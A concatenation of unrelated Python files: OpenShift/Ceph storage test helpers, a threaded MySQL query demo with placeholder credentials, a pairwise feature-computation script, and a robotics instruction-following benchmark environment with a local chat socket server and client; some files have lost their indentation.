timeout=60
)
ceph_init_cmd = '/rook/tini' + ' ' + ' '.join(original_osd_args)
try:
logger.info('Following command should expire after 7 seconds')
dummy_pod.exec_cmd_on_pod(ceph_init_cmd, timeout=7)
except TimeoutExpired:
logger.info('Killing /rook/tini process')
try:
dummy_pod.exec_sh_cmd_on_pod(
"kill $(ps aux | grep '[/]rook/tini' | awk '{print $2}')"
)
except CommandFailed:
pass
return dummy_deployment, dummy_pod
def get_failure_domin():
"""
    Function to get the failure domain of the CephBlockPool
Returns:
str: Failure domain from cephblockpool
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd(ceph_cmd="ceph osd crush rule dump", format='json')
assert out, "Failed to get cmd output"
for crush_rule in out:
if constants.CEPHBLOCKPOOL.lower() in crush_rule.get("rule_name"):
for steps in crush_rule.get("steps"):
if "type" in steps:
return steps.get("type")
def wait_for_ct_pod_recovery():
"""
    In node failure scenarios in which the selected node is
    running the ceph tools pod, we'll want to wait for the pod to recover
Returns:
bool: True in case the ceph tools pod was recovered, False otherwise
"""
try:
_ = get_admin_key()
except CommandFailed as ex:
logger.info(str(ex))
if "connection timed out" in str(ex):
logger.info(
"Ceph tools box was running on the node that had a failure. "
"Hence, waiting for a new Ceph tools box pod to spin up"
)
wait_for_resource_count_change(
func_to_use=pod.get_all_pods, previous_num=1,
namespace=config.ENV_DATA['cluster_namespace'], timeout=120,
selector=constants.TOOL_APP_LABEL
)
return True
else:
return False
return True
def label_worker_node(node_list, label_key, label_value):
"""
Function to label worker node for running app pods on specific worker nodes.
Args:
        node_list (list): List of node names
        label_key (str): Label key to be added to the worker nodes
        label_value (str): Value of the label
"""
ocp_obj = OCP()
out = ocp_obj.exec_oc_cmd(
command=f"label node {' '.join(node_list)} {label_key}={label_value}", out_yaml_format=False
)
logger.info(out)
def remove_label_from_worker_node(node_list, label_key):
"""
Function to remove label from worker node.
Args:
        node_list (list): List of node names
        label_key (str): Label key to be removed from the worker nodes
"""
ocp_obj = OCP()
out = ocp_obj.exec_oc_cmd(
command=f"label node {' '.join(node_list)} {label_key}-", out_yaml_format=False
)
logger.info(out)
def get_pods_nodes_logs():
"""
Get logs from all pods and nodes
Returns:
dict: node/pod name as key, logs content as value (string)
"""
all_logs = {}
all_pods = pod.get_all_pods()
all_nodes = node.get_node_objs()
for node_obj in all_nodes:
node_name = node_obj.name
log_content = node.get_node_logs(node_name)
all_logs.update({node_name: log_content})
for pod_obj in all_pods:
try:
pod_name = pod_obj.name
log_content = pod.get_pod_logs(pod_name)
all_logs.update({pod_name: log_content})
except CommandFailed:
pass
return all_logs
def get_logs_with_errors(errors=None):
"""
From logs of all pods and nodes, get only logs
containing any of specified errors
Args:
errors (list): List of errors to look for
Returns:
dict: node/pod name as key, logs content as value; may be empty
"""
all_logs = get_pods_nodes_logs()
output_logs = {}
errors_list = constants.CRITICAL_ERRORS
if errors:
errors_list = errors_list + errors
for name, log_content in all_logs.items():
for error_msg in errors_list:
if error_msg in log_content:
logger.debug(f"Found '{error_msg}' in log of {name}")
output_logs.update({name: log_content})
log_path = f"{ocsci_log_path()}/{name}.log"
with open(log_path, 'w') as fh:
fh.write(log_content)
return output_logs
def modify_osd_replica_count(resource_name, replica_count):
"""
Function to modify osd replica count to 0 or 1
Args:
resource_name (str): Name of osd i.e, 'rook-ceph-osd-0-c9c4bc7c-bkf4b'
replica_count (int): osd replica count to be changed to
Returns:
bool: True in case if changes are applied. False otherwise
"""
ocp_obj = ocp.OCP(kind=constants.DEPLOYMENT, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
params = f'{{"spec": {{"replicas": {replica_count}}}}}'
resource_name = '-'.join(resource_name.split('-')[0:4])
return ocp_obj.patch(resource_name=resource_name, params=params)
def collect_performance_stats(dir_name):
"""
    Collect performance stats and save them to a file in JSON format.
    Args:
        dir_name (str): directory name to store stats.
    Performance stats include:
        IOPs and throughput percentage of the cluster
        CPU and memory consumption of each node
"""
from ocs_ci.ocs.cluster import CephCluster
log_dir_path = os.path.join(
os.path.expanduser(config.RUN['log_dir']),
f"failed_testcase_ocs_logs_{config.RUN['run_id']}",
f"{dir_name}_performance_stats"
)
if not os.path.exists(log_dir_path):
logger.info(f'Creating directory {log_dir_path}')
os.makedirs(log_dir_path)
performance_stats = {}
external = config.DEPLOYMENT['external_mode']
if external:
# Skip collecting performance_stats for external mode RHCS cluster
logging.info("Skipping status collection for external mode")
else:
ceph_obj = CephCluster()
# Get iops and throughput percentage of cluster
iops_percentage = ceph_obj.get_iops_percentage()
throughput_percentage = ceph_obj.get_throughput_percentage()
performance_stats['iops_percentage'] = iops_percentage
performance_stats['throughput_percentage'] = throughput_percentage
# ToDo: Get iops and throughput percentage of each nodes
# Get the cpu and memory of each nodes from adm top
master_node_utilization_from_adm_top = \
node.get_node_resource_utilization_from_adm_top(node_type='master')
worker_node_utilization_from_adm_top = \
node.get_node_resource_utilization_from_adm_top(node_type='worker')
# Get the cpu and memory from describe of nodes
master_node_utilization_from_oc_describe = \
node.get_node_resource_utilization_from_oc_describe(node_type='master')
worker_node_utilization_from_oc_describe = \
node.get_node_resource_utilization_from_oc_describe(node_type='worker')
performance_stats['master_node_utilization'] = master_node_utilization_from_adm_top
performance_stats['worker_node_utilization'] = worker_node_utilization_from_adm_top
performance_stats['master_node_utilization_from_oc_describe'] = master_node_utilization_from_oc_describe
performance_stats['worker_node_utilization_from_oc_describe'] = worker_node_utilization_from_oc_describe
file_name = os.path.join(log_dir_path, 'performance')
with open(file_name, 'w') as outfile:
json.dump(performance_stats, outfile)
def validate_pod_oomkilled(
pod_name, namespace=defaults.ROOK_CLUSTER_NAMESPACE, container=None
):
"""
    Check whether OOM kill ("signal: killed") messages are present in the pod log
Args:
pod_name (str): Name of the pod
namespace (str): Namespace of the pod
container (str): Name of the container
Returns:
bool : True if oomkill messages are not found on log.
False Otherwise.
Raises:
        AssertionError: If the logs could not be fetched
"""
rc = True
try:
pod_log = pod.get_pod_logs(
pod_name=pod_name, namespace=namespace,
container=container, previous=True
)
result = pod_log.find("signal: killed")
if result != -1:
rc = False
except CommandFailed as ecf:
assert f'previous terminated container "{container}" in pod "{pod_name}" not found' in str(ecf), (
"Failed to fetch logs"
)
return rc
def validate_pods_are_running_and_not_restarted(
pod_name, pod_restart_count, namespace
):
"""
    Validate that the given pod is in Running state and has not been restarted or re-spun
Args:
pod_name (str): Name of the pod
pod_restart_count (int): Restart count of pod
namespace (str): Namespace of the pod
Returns:
bool : True if pod is in running state and restart
count matches the previous one
"""
ocp_obj = ocp.OCP(kind=constants.POD, namespace=namespace)
pod_obj = ocp_obj.get(resource_name=pod_name)
restart_count = pod_obj.get('status').get('containerStatuses')[0].get('restartCount')
pod_state = pod_obj.get('status').get('phase')
if pod_state == 'Running' and restart_count == pod_restart_count:
logger.info("Pod is running state and restart count matches with previous one")
return True
logger.error(f"Pod is in {pod_state} state and restart count of pod {restart_count}")
logger.info(f"{pod_obj}")
return False
def calc_local_file_md5_sum(path):
"""
Calculate and return the MD5 checksum of a local file
    Args:
path(str): The path to the file
Returns:
str: The MD5 checksum
"""
with open(path, 'rb') as file_to_hash:
file_as_bytes = file_to_hash.read()
return hashlib.md5(file_as_bytes).hexdigest()
def retrieve_default_ingress_crt():
"""
Copy the default ingress certificate from the router-ca secret
to the local code runner for usage with boto3.
"""
default_ingress_crt_b64 = OCP(
kind='secret',
namespace='openshift-ingress-operator',
resource_name='router-ca'
).get().get('data').get('tls.crt')
decoded_crt = base64.b64decode(default_ingress_crt_b64).decode('utf-8')
with open(constants.DEFAULT_INGRESS_CRT_LOCAL_PATH, 'w') as crtfile:
crtfile.write(decoded_crt)
def storagecluster_independent_check():
"""
Check whether the storagecluster is running in independent mode
by checking the value of spec.externalStorage.enable
Returns:
        bool: True if the storagecluster is running in external mode, False otherwise
"""
storage_cluster = OCP(
kind='StorageCluster',
namespace=config.ENV_DATA['cluster_namespace']
).get().get('items')[0]
return bool(
storage_cluster.get('spec', {}).get(
'externalStorage', {}
).get('enable', False)
)
def get_pv_size(storageclass=None):
"""
    Get PV sizes for the requested storageclass
Args:
storageclass (str): Name of storageclass
Returns:
        list: list of PV sizes
"""
return_list = []
ocp_obj = ocp.OCP(kind=constants.PV)
pv_objs = ocp_obj.get()['items']
for pv_obj in pv_objs:
if pv_obj['spec']['storageClassName'] == storageclass:
return_list.append(pv_obj['spec']['capacity']['storage'])
return return_list
def get_cluster_proxies():
"""
Get http and https proxy configuration.
* If configuration ENV_DATA['http_proxy'] (and prospectively
ENV_DATA['https_proxy']) exists, return the respective values.
(If https_proxy not defined, use value from http_proxy.)
* If configuration ENV_DATA['http_proxy'] doesn't exist, try to gather
cluster wide proxy configuration.
* If no proxy configuration found, return empty string for all http_proxy,
https_proxy and no_proxy.
Returns:
tuple: (http_proxy, https_proxy, no_proxy)
"""
if 'http_proxy' in config.ENV_DATA:
http_proxy = config.ENV_DATA['http_proxy']
https_proxy = config.ENV_DATA.get(
'https_proxy', config.ENV_DATA['http_proxy']
)
no_proxy = config.ENV_DATA.get('no_proxy', '')
else:
ocp_obj = ocp.OCP(kind=constants.PROXY, resource_name='cluster')
proxy_obj = ocp_obj.get()
http_proxy = proxy_obj.get('spec', {}).get('httpProxy', '')
https_proxy = proxy_obj.get('spec', {}).get('httpsProxy', '')
no_proxy = proxy_obj.get('status', {}).get('noProxy', '')
logger.info("Using http_proxy: '%s'", http_proxy)
logger.info("Using https_proxy: '%s'", https_proxy)
logger.info("Using no_proxy: '%s'", no_proxy)
return http_proxy, https_proxy, no_proxy
def default_volumesnapshotclass(interface_type):
"""
Return default VolumeSnapshotClass based on interface_type
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
Returns:
OCS: VolumeSnapshotClass Instance
"""
if interface_type == constants.CEPHBLOCKPOOL:
resource_name = constants.DEFAULT_VOLUMESNAPSHOTCLASS_RBD
elif interface_type == constants.CEPHFILESYSTEM:
resource_name = constants.DEFAULT_VOLUMESNAPSHOTCLASS_CEPHFS
base_snapshot_class = OCP(
kind=constants.VOLUMESNAPSHOTCLASS,
resource_name=resource_name
)
return OCS(**base_snapshot_class.data)
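# Illustrative usage sketch (not part of the original helpers module): a test could
# combine a few of the helpers defined above, e.g. log the cluster proxy settings and
# checksum a local artifact. The file path used here is a hypothetical placeholder.
def _example_proxy_and_checksum(path='/tmp/example-artifact.bin'):
    http_proxy, https_proxy, no_proxy = get_cluster_proxies()
    logger.info(
        "Cluster proxies - http: '%s', https: '%s', no_proxy: '%s'",
        http_proxy, https_proxy, no_proxy
    )
    # MD5 of a local file, e.g. to compare against data written to a PVC later.
    return calc_local_file_md5_sum(path)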
|
mysql.py
|
# Import the pymysql package
import pymysql
import threading
def demo(conn):
    """Run a sample query on the given connection and print the row count."""
    try:
        cur = conn.cursor()  # get a cursor
        # Note: the table name and connection details below are anonymized placeholders.
        cur.execute('select id from 10 ORDER BY RAND() LIMIT 1000')
        data = cur.fetchall()
        print(len(data))
        cur.close()  # close the cursor
        conn.close()  # release the database connection
    except Exception:
        print("Query failed")
def get_connect():
    """
    Open a database connection.
    Returns: a pymysql connection object
    """
    # The connection parameters are anonymized placeholders.
    conn = pymysql.connect(host='10', user='10', passwd='10.com', db='10', port=10, charset='utf8mb4')
    if not conn:
        raise NameError("Failed to connect to the database")
    return conn
def loop():
    threads = []
    threads_num = 5  # number of threads
    # Give each thread its own connection, then start and wait for them all.
    for _ in range(threads_num):
        conn = get_connect()
        t = threading.Thread(target=demo, args=(conn,))
        threads.append(t)
    for t in threads:
        t.start()
    for t in threads:
        t.join()
if __name__ == '__main__':
    loop()
|
otu_table_pairwise.py
|
import numpy as np
import util as utl
import threading
import time
def otu_pairwise(path, datakind):
dataset = path
rootdir = '/media/banua/Data/Kuliah/Destiny/Tesis/Program/csipb-jamu-prj.20160613.fixed/similarity-func/data/'
data = np.loadtxt(rootdir+dataset, delimiter=",")
data = data[:, 1:]
otu_tuple = ()
for i in range(0, len(data)):
for j in range(i+1, len(data)):
x1 = data[i, :]
x2 = data[j, :]
a = utl.getFeatureA(x1,x2); b = utl.getFeatureB(x1,x2)
c = utl.getFeatureC(x1,x2); d = utl.getFeatureD(x1,x2)
otu_tuple += ( (a, b, c, d) ),
            print('pair {} and {}'.format(i, j))
    print(len(data))
otu_tuple = np.asarray(otu_tuple)
np.savetxt(datakind+'-otu.csv', otu_tuple, delimiter="\t", fmt="%s")
try:
(threading.Thread(target=otu_pairwise, args=('jamu/jamu_clean.csv', 'jamu'))).start()
(threading.Thread(target=otu_pairwise, args=('stahl-maccs/stahl-maccs.csv', 'maccs'))).start()
(threading.Thread(target=otu_pairwise, args=('zoo/zoo.csv', 'zoo'))).start()
except Exception:
    print("Error: unable to start thread")
|
benchmark_2d.py
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Benchmark environment for the Instruction Following/2D benchmark."""
import collections
import enum
import math
import os
import queue
import signal
import socket
import sys
import tempfile
import threading
import time
from typing import Any, Dict, List, Optional, Tuple, cast, TYPE_CHECKING
from typing import Callable
from absl import app # type: ignore
from absl import flags # type: ignore
import gym # type: ignore
import gym.core # type: ignore
from gym.utils import seeding # type: ignore
import numpy as np # type: ignore
from google.protobuf import timestamp_pb2
from pyreach.common.proto_gen import logs_pb2
from pyreach.core import Pose
from pyreach.gyms import core
from pyreach.gyms import reach_env
from pyreach.gyms.arm_element import ReachArmCommand
from pyreach.gyms.task_element import ReachAction as ReachTaskAction
# The type of the return from step.
StepReturn = Tuple[core.Observation, float, bool, Any]
# The benchmark environment ID. This corresponds to the id in
# gyms/__init__.py.
ENV_ID = "benchmark-2d-v1"
# The official 2d benchmark task code.
TASK_CODE_2D = "128"
# The number of bytes expected in each chat transaction. This is the maximum
# size of a short- or long-horizon instruction.
CHAT_LEN_BYTES = 256
# The file in the os temp dir containing the chat port number.
CHAT_PORT_FILE = "benchmark_2d_chat_port.txt"
# The orientation for the tool to point straight down.
TOOL_ORIENTATION_RADS = (1.27, -2.845, -0.054)
# The rough limits for the workspace. This is based on the end effector tip.
# It's a bit sloppy, because there may be some areas which can't be reached,
# especially close to the robot base and close to the far corners.
BOARD_X_LIMITS_METERS = (0.200, 0.610) # near, far w.r.t. base
BOARD_Y_LIMITS_METERS = (-0.297, 0.335) # right, left w.r.t. base
BOARD_Z_LIMITS_METERS = (0.1, 0.5)
# Safe z-height. This is above the blocks, so movement at this height will
# not impact against any blocks.
SAFE_Z_METERS = 0.262
# z-height where the end-effector can push the blocks around.
PUSH_Z_METERS = 0.184
# Maximum allowed linear distance (meters) between (i) desired cartesian pose,
# and (ii) measured cartesian pose.
SAFE_SERVO_DIST_METERS = 0.071
# Resting corner x,y coordinates (upper right with respect to a camera
# facing the base from the far side of the board, or near left with respect to
# the base) where the arm goes after a test case.
CORNER_X_METERS = 0.200
CORNER_Y_METERS = 0.335
# The number of seconds to complete a long-horizon instruction.
TIMEOUT_PER_TASK_SECONDS = 4 * 60.0
RESPONSE_DONE: int = 1
RESPONSE_FAILED: int = 2 # Done with error other than timeout
RESPONSE_ABORTED: int = 3
RESPONSE_REJECTED: int = 4
RESPONSE_TIMEOUT: int = 5 # Done with timeout error.
# The path to the file containing the instructions. The file is expected to have
# one string per line, the long-horizon text instruction to carry out. It must
# be no more than 256 bytes long when encoded as UTF-8.
INSTRUCTIONS_PATH: str = "benchmark_2d_long_horizon_instrs.txt"
# The maximum number of test cases to present.
NUM_TEST_CASES: int = 3
# Required for mypy to pass typechecking.
if TYPE_CHECKING:
SimpleQueue = queue.SimpleQueue
else:
class FakeGenericMeta(type):
def __getitem__(cls, item):
return cls
class SimpleQueue(queue.Queue, metaclass=FakeGenericMeta):
pass
class Instruction:
"""Represents a single long-horizon instruction to test the agent against."""
def __init__(self, instruction: str):
self.instruction = instruction
class SetupState(enum.Enum):
"""The state of the environment."""
# The environment needs the human to reset the environment.
AWAIT_CLIENT = enum.auto()
# The agent is attempting to follow the instruction.
ATTEMPTING_INSTRUCTION = enum.auto()
class TextInstruction:
"""Text instruction class for holding text instruction data.
Attributes:
name: The name of the corresponding device.
ts: The timestamp when the instruction was created.
instr: The UTF-8 encoded text instruction.
"""
name: str
ts: float
instr: np.ndarray
_lock: threading.Lock
def __init__(self, name: str):
assert name, "TextInstruction name cannot be empty"
self.name = name
self.ts = 0
self.instr = self._str_to_nparray("")
self._lock = threading.Lock()
def set(self, instr: str) -> None:
"""Sets this instruction's data.
Thread-safe.
Args:
instr: The instruction to set.
"""
self._lock.acquire()
self.ts = time.time()
self.instr = self._str_to_nparray(instr)
self._lock.release()
def inject(self, obs: core.Observation) -> None:
"""Injects this instruction into the observation.
Thread safe.
Args:
obs: The observation to inject the instruction into.
"""
obs = cast(Dict[str, Any], obs)
self._lock.acquire()
obs[self.name] = {
"ts": self.ts,
"instruction": self.instr,
}
self._lock.release()
def _str_to_nparray(self, s: str) -> np.ndarray:
"""Encodes the string as UTF-8, returning the data as an ndarray.
If the string encodes to more than CHAT_LEN_BYTES, the array is
truncated to CHAT_LEN_BYTES.
Args:
s: The string to encode.
Returns:
The UTF-8 encoded string in an np.ndarray of floats.
"""
bs = s.encode("utf-8")[:CHAT_LEN_BYTES]
buff = bytearray([0] * CHAT_LEN_BYTES)
buff[:len(bs)] = bs
    return np.array(list(buff), dtype=float)
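# Illustrative sketch (not part of the original benchmark file): decodes an
# instruction array produced by TextInstruction._str_to_nparray() above back into a
# Python string, e.g. for an agent inspecting the observation. Trailing zero padding
# is stripped before decoding.
def _nparray_to_str(arr: np.ndarray) -> str:
  """Decodes a CHAT_LEN_BYTES-long float array of UTF-8 bytes back to a string."""
  data = bytes(int(b) for b in arr).rstrip(b"\x00")
  return data.decode("utf-8", "ignore")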
class ChatServer:
"""Sets up a socket at a random port to receive chat messages.
The port number chosen is stored in /{TMPDIR}/{CHAT_PORT_FILE}.
Upon initial connection, it will send the long-horizon text instruction over
to the connecting client. Then it will wait for CHAT_LEN_BYTES length
messages and notify the environment for each message. When the client closes
the connection, we assume the task is done.
"""
instruction: str
server: socket.socket
sock: socket.socket
thread: threading.Thread
chatport: int
def __init__(self, instruction: str,
notify: Callable[[bytearray], None]):
self.instruction = instruction
self.notify = notify
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server.bind((socket.gethostname(), 0))
self.chatport = self.server.getsockname()[1]
with open(f"{tempfile.gettempdir()}/{CHAT_PORT_FILE}", "w") as f:
f.write(f"{self.chatport}")
self.server.listen(1)
print(f"{time.time()}: Waiting for chat client to connect")
(self.sock, _) = self.server.accept()
self.thread = threading.Thread(target=self.go)
self.thread.start()
def go(self) -> None:
"""Handles the connection.
First sends the long-horizon text instruction. Then awaits low-level text
instructions, until the client closes the connection.
"""
bs = self.instruction.encode("utf-8")[:CHAT_LEN_BYTES]
buff = bytearray([0] * CHAT_LEN_BYTES)
buff[:len(bs)] = bs
total = 0
while total < CHAT_LEN_BYTES:
sent = self.sock.send(buff[total:])
if sent == 0:
print("")
print(f"{time.time()}: Chat client closed connection.")
return
total = total + sent
while True:
data = bytearray()
while len(data) < CHAT_LEN_BYTES:
chunk = self.sock.recv(CHAT_LEN_BYTES - len(data))
if not chunk:
print("")
print(f"{time.time()}: Chat client closed connection.")
self.stop()
return
data.extend(chunk)
self.notify(data)
def stop(self) -> None:
"""Stops the server."""
print("Stopping chat server...")
fname = f"{tempfile.gettempdir()}/{CHAT_PORT_FILE}"
try:
os.remove(fname)
except FileNotFoundError:
pass
try:
self.sock.shutdown(socket.SHUT_RD)
except OSError:
pass # This is okay.
self.sock.close()
try:
self.server.shutdown(socket.SHUT_RD)
except OSError:
pass # This is okay.
self.server.close()
def is_alive(self) -> bool:
return self.thread.is_alive()
class ChatClient:
"""Connects to the server to send low-level text instructions.
Upon connection, waits for the long-horizon text instruction from the server.
Then waits for input, and sends each message as a CHAT_LEN_BYTES-length
low-level text instruction to the server.
If the user ctrl-C's out of the input, we send that ctrl-C to the server
as an indication that the user claims the long-horizon instruction is done.
If the server disconnects, we either ran out of time or the agent claims
the long-horizon instruction is done.
This happens as many as NUM_TEST_CASES times.
"""
client: socket.socket
def __init__(self) -> None:
for _ in range(NUM_TEST_CASES):
print("-------------------- RESET --------------------------------")
print("1. E-stop the robot.")
print("2. Roughly bunch all the blocks in the center.")
print("3. Separate them all a bit.")
print("4. Release the e-stop.")
print("5. Hit return.")
_ = input("> ")
if not self.connect():
print("The agent never became ready. Probably a bug.")
return
if not self.await_instruction():
return
thread = threading.Thread(target=self.await_server_termination)
thread.start()
while self.getline():
pass
while thread.is_alive():
try:
time.sleep(1)
except KeyboardInterrupt:
pass # This is expected if client hits ctrl-C.
time.sleep(1) # Enough time for the server to delete its port file.
print("No more test cases.")
def connect(self) -> bool:
"""Gets the port number from the server's port file."""
port = -1
for _ in range(30):
try:
fname = f"{tempfile.gettempdir()}/{CHAT_PORT_FILE}"
with open(fname, "r") as f:
port = int(f.readline())
except FileNotFoundError:
print("The agent is not ready (no port file)... sleeping 1 second")
time.sleep(1)
continue
if port == -1:
print("The agent never became ready. Probably a bug.")
return False
print(f"Connecting to port {port}")
try:
self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.client.connect((socket.gethostname(), port))
break
except ConnectionRefusedError:
print("The agent is not ready: connection refused... sleeping 1 second")
time.sleep(1)
continue
print("Connected to agent.")
return True
def await_server_termination(self) -> None:
"""Blocks until server terminates."""
_ = self.client.recv(CHAT_LEN_BYTES)
os.kill(os.getpid(), signal.SIGINT)
print("")
print("Server closed connection. Please wait for agent cleanup.")
def getline(self) -> bool:
"""Gets a short-horizon instruction from the user."""
buff = bytearray([0] * CHAT_LEN_BYTES)
line = "\u0003" # ctrl-C
try:
line = input("> ")
except KeyboardInterrupt:
print("Completion indicated!")
pass
bs = line.encode("utf-8")[:CHAT_LEN_BYTES]
buff[:len(bs)] = bs
total = 0
while total < CHAT_LEN_BYTES:
sent = self.client.send(buff[total:])
if sent == 0:
print("")
print("Completion or time limit indicated by "
"agent (server closed connection).")
return False
total = total + sent
if line == "\u0003":
print("Completion indication sent to agent. "
"Please wait for agent cleanup.")
return False
return True
def await_instruction(self) -> bool:
"""Waits for a long-horizon instruction from the server."""
data = bytearray()
while len(data) < CHAT_LEN_BYTES:
chunk = self.client.recv(CHAT_LEN_BYTES - len(data))
if not chunk:
print("")
print("Server closed connection.")
return False
data.extend(chunk)
print("------------------ INSTRUCTION -----------------------------")
print("")
print("Give the robot instructions to help it complete the following")
print("task. End each instruction with a return. If you see that the robot")
print("completed the entire task, hit ctrl-C to tell it that it finished.")
print("You've got four minutes from now!")
print("")
print(data.decode("utf-8", "ignore"))
print("")
print("------------------------------------------------------------")
return True
class Benchmark2DEnv(reach_env.ReachEnv):
"""Benchmark environment for the Instruction Following/2D benchmark.
See go/robotics-benchmark-2d and gym_api.md.
Briefly, the agent controls the robot, and a human (the "instructor")
gives the agent short-horizon instructions with the goal of completing
a long-horizon instruction. The agent is given the long-horizon
instruction also, but is not required to understand it or use it.
Procedure:
1. Run the gym; the gym connects to the evaluation cell. When the instructor
is ready, the instructor runs the chat client, which connects to the gym.
2. The 100 long-horizon instructions in the INSTRUCTIONS_PATH file are
shuffled by the gym.
* Each long-horizon instruction is no more than 256 bytes long when
encoded in UTF-8.
3. For each of the first three (shuffled) instructions:
a. The arm is moved up and out of the way of the board.
b. The gym tells the instructor to e-stop the robot, bunch all the blocks
together in the center, separate them a bit, and un-e-stop the robot.
c. When the instructor tells the gym this was done, the gym:
i. Sends a task start.
ii. Moves the arm down to an appropriate z-height to push the blocks.
iii. Gives the long-horizon instruction to the agent as an array of 256
floats. Each float is one byte of UTF-8 encoded text. Bytes beyond
the length of the encoded text are zero.
iv. Gives the long-horizon instruction to the instructor as text.
v. Starts a timer for four minutes.
vi. Sends an annotation for the beginning of the episode.
vii. Sends an annotation for the long-horizon instruction.
d. The instructor gives the gym short-horizon instructions which are passed
through to the agent verbatim.
* Each short-horizon instruction may be no more than 256 bytes long.
* Short-horizon instructions longer than 256 bytes are truncated to 256
bytes.
* Short-horizon instructions have no limit for their frequency of
submission.
* Short-horizon instructions are also sent in annotations.
e. The agent attempts to carry out the instructor's short-horizon
instructions.
f. The episode ends in any of these cases:
i. The instructor declares that the long-horizon instruction is done, by
hitting ctrl-C in the chat client.
ii. The agent declares that the long-horizon instruction is done, by
setting the "done" action to 1.
iii. The four-minute timer elapses.
g. The gym sends an annotation to mark the end of the episode.
h. The arm is moved up and out of the way of the board.
i. The gym sends a task end.
4. The gym disconnects from the robot.
From a logs perspective, the data is as follows:
* Gym connects to robot.
* Repeat 3 times:
* Robot arm moves out of the way.
* Task start (task code 128)
* Robot arm moves to ready position.
* Annotation: begin test case:
annotation.point_measurement.space = "benchmark-2d-v1",
annotation.point_measurement.name = "test_case_begin_ts",
annotation.point_measurement.value.seconds = timestamp
* Annotation: long-horizon instruction:
long_horizon_instruction.text = long-horizon instruction
* Robot arm moves, with short-horizon instruction annotations when
issued:
short_horizon_instruction.text = short-horizon instruction
* Annotation: end test case:
annotation.point_measurement.space = "benchmark-2d-v1",
annotation.point_measurement.name = "test_case_begin_ts",
annotation.point_measurement.value.seconds = time from
test_case_begin_ts
* Robot arm moves out of the way.
* Task end (task code 128)
* Gym disconnects from robot.
"""
def __init__(self, **kwargs: Any) -> None:
"""Initializes the environment.
Arguments:
**kwargs: Keyword arguments.
Keyword args accepted:
tc (str): The task code to override the standard task code with.
disable_time_limit (bool): Whether to disable the standard time limit.
"""
self._low_level_queue: SimpleQueue[str] = SimpleQueue()
self._timer_running: bool = False
self._deadline: float = 0.0
# The full list of long-horizon instructions.
self._long_horizon_instructions: List[Instruction] = self._load_test_cases()
# The random number generator for the environment.
self._np_random: np.random.RandomState = np.random.RandomState()
# The long-horizon instruction number to attempt
self._instr_num: int = 0
# The environment state.
self._setup_state: SetupState = SetupState.AWAIT_CLIENT
# The last observed server timestamp, for sending annotations.
self._last_server_ts: float = 0.0
# The last observed pose, for checking for unsafe actions.
self._last_pose: Optional[np.ndarray] = None
# The time at which the long-horizon instruction begins, defined as just
# before the arm drops to the pushing z-height before the long-horizon
# instruction is annotated. See _start_test_case() for details.
self._test_case_begin_ts: float = 0.0
# Memoized action space, with done space injected.
self._action_space: Optional[core.Space] = None
# Memoized observation space, with instruction spaces injected.
self._observation_space: Optional[core.Space] = None
# The text instruction data.
self._high_level_instruction = TextInstruction("long_horizon_instruction")
self._low_level_instruction = TextInstruction("short_horizon_instruction")
# The chat server.
self._chat_server: Optional[ChatServer] = None
# Whether the chat client sent a ctrl-C to indicate test case completed.
self._chat_client_indicated_end: bool = False
self._task_code = TASK_CODE_2D
if "tc" in kwargs:
self._task_code = str(kwargs["tc"])
self._disable_time_limit = False
if "disable_time_limit" in kwargs:
self._disable_time_limit = bool(kwargs["disable_time_limit"])
self.seed()
low_joint_angles = tuple([-6.283, -2.059, -3.926, -3.141, -1.692, -6.283])
high_joint_angles = tuple([6.283, 2.094, 0.191, 3.141, 3.141, 6.283])
task_params: Dict[str, str] = {"task-code": self._task_code}
pyreach_config: Dict[str, reach_env.ReachElement] = {
"arm":
reach_env.ReachArm("", low_joint_angles, high_joint_angles,
response_queue_length=1, is_synchronous=False),
"color_camera": # realsense
reach_env.ReachColorCamera("", shape=(360, 640),
initial_stream_request_period=0.03),
"server":
reach_env.ReachServer("Server"),
"task":
reach_env.ReachTask("Task"),
"annotation":
reach_env.ReachAnnotation("",
is_synchronous=False,
maximum_size=1024),
}
super().__init__(
pyreach_config=pyreach_config, task_params=task_params, **kwargs)
@property
def action_space(self) -> core.Space:
"""Returns the action space.
This memoizes the ReachEnv action space, adds the done space, and
hides the task space.
"""
if self._action_space is not None:
return self._action_space
a = super().action_space
a["done"] = gym.spaces.Discrete(2)
del a["task"]
self._action_space = a
return self._action_space
def _strip_action(self, action: core.Action) -> core.Action:
"""Removes the 'done' action for passing to the base step()."""
action = cast(Dict[str, Any], action)
a = action.copy()
if "done" in a:
del a["done"]
return a
@property
def observation_space(self) -> core.Space:
"""Returns the observation space.
This memoizes the ReachEnv observation space, and then adds the
text instruction spaces.
"""
if self._observation_space is not None:
return self._observation_space
s = super().observation_space
s[self._high_level_instruction.name] = gym.spaces.Dict({
"ts": gym.spaces.Box(low=0, high=sys.maxsize, shape=()),
"instruction": gym.spaces.MultiDiscrete(CHAT_LEN_BYTES * [255]),
})
s[self._low_level_instruction.name] = gym.spaces.Dict({
"ts": gym.spaces.Box(low=0, high=sys.maxsize, shape=()),
"instruction": gym.spaces.MultiDiscrete(CHAT_LEN_BYTES * [255]),
})
self._observation_space = s
return self._observation_space
def _update_observation(self, obs: core.Observation) -> None:
"""Injects the high- and low-level text instructions into the observation.
They are injected into the observation passed in.
Also records the last server timestamp for annotations, and the
last pose for checking unsafe moves.
Args:
obs: The observation to inject the instructions into.
"""
obs = cast(Dict[str, Any], obs)
self._high_level_instruction.inject(obs)
self._low_level_instruction.inject(obs)
self._last_server_ts = obs["server"]["latest_ts"]
self._last_pose = obs["arm"]["pose"]
def _load_test_cases(self) -> List[Instruction]:
"""Loads the long horizon instructions from this directory."""
test_cases = []
instr_dir = os.path.dirname(os.path.realpath(__file__))
path = os.path.join(instr_dir, INSTRUCTIONS_PATH)
with open(path) as f:
